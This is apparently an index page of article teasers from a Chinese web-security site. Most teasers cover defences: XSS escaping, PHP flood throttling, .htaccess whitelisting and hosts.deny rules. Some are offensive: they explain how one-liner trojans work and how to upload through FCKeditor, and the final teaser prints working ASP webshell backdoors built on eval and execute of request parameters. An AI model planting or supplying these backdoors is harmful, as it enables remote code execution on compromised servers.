防止跨站点脚本攻击

逃避参数和用户输入     这是经典的XSS攻击,可以打开您的服务或Web应用程序,黑客的攻击。根据设计,该网站显示用户的ID,这是作为URL参数传递。下面的脚本将采取的ID,并显示一个值得欢迎的的消息。   <script type="text/javascript">   var start = window.location.href.in...

- 阅读全文 -

php设置刷新的间隔时间防护cc攻击

最近几个网站CC不断,了解一下CC的原理,然后勉强找个方法暂时防护下吧。实在是伤不起。 附上现在被攻击的屏蔽截图     <?php     @session_start(); $allow_sep = "1"; //刷新时间 if (isset($_SESSION["post_sep"])) { if (time() - $_SESSION["pos...

- 阅读全文 -

用.htaccess限制执行文件类型

现在一般都是使用黑名单的方法过滤非法字符,不过黑名单也有它的不足。怎么才能用白名单过滤呢 在.htaccess里定义 <</>Files ~ “.*”> Deny from all <</>/Files> <</>FilesMatch “(1\.txt)|(2\.txt)”> Allow from all <</&...

- 阅读全文 -

linux远程登陆的安全设置

#编辑/etc/hosts.deny,添加以下内容 #第一个all表示对所有服务有效,第二个all表示对所有ip有效,除了222.222.222.222和222.222.222.223,ip之间用空格分开 ALL: ALL EXCEPT 222.222.222.222 222.222.222.223 可以查看man hosts.deny www.webshell.cc /var/log/auth

- 阅读全文 -

恢复WINDOWS SERVER 2003的默认权限设置

  在对WIN2003进行安全配置的时候,经常一不小心就把权限设置乱掉,导致   ASP无法执行/PHP无法执行/某些服务无法启动等等奇怪故障,如果你对所有做过的权限设置都有记录的话,可以一步一步逆推回去来解决问题,如果没有记录,那么最简单的办法就是恢复默认权限. 仅需使用如下命令:   Secedit /configure /db %SYSTEMROOT%\secu...

- 阅读全文 -

一句话木马的适用环境和工作原理/原理应用解析

一句话木马的适用环境: 1.服务器的来宾账户有写入权限 2.已知数据库地址且数据库格式为asa或asp 3.在数据库格式不为asp或asa的情况下,如果能将一句话插入到asp文件中也可   一句话木马的工作原理: "一句话木马"服务端(本地的html提交文件) 就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交...

- 阅读全文 -

PHP站点安全检测和防范

  今天我们讲讲PHP注入的安全规范,防止自己的网站被sql注入。首先我分析了这站的几个页面     https://www.webshell.cc/show.?id=2227     https://www.webshell.cc/show.php?id=2314     通过最简单的and 1 //and2 这样的注入,我并没有发现问题,但是经过一段时间的研...

- 阅读全文 -

解决Fckeditor删除所有上传页面如何上传

  首先,你得确定下Fckeditor的版本。   /FCKeditor/editor/dialog/fck_about.html   其次,你确定下以下几个上传页面是否真的被删除了呢?   /FCKeditor/editor/filemanager/browser/default/browser.html /FCKeditor/editor/fileman...

- 阅读全文 -

webshell一句话木马大全

  比较全的webshell一句话包括ASP,PHP,ASPX,JSP asp一句话木马程序代码 <%eval request("sb")%> 程序代码 <%execute request("sb")%> 程序代码 <%execute(request("sb"))%> 程序代码 <%execute request("sb")%><%'...

- 阅读全文 -